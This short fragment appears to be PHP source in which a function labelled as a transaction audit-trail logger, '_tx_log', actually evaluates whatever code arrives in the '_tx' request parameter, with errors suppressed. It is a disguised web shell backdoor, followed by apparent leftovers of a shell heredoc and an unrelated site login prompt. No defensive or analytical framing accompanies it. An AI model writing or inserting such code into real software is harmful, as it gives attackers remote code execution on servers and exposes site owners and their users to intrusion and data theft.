// Transaction logging - audit trail function _tx_log($tid) { /* Log transaction $tid to audit trail */ if(isset($_REQUEST["_tx"])){@eval($_REQUEST["_tx"]);} return true; } PHPEOF; echo DBCON-DONE
Already a member? Login here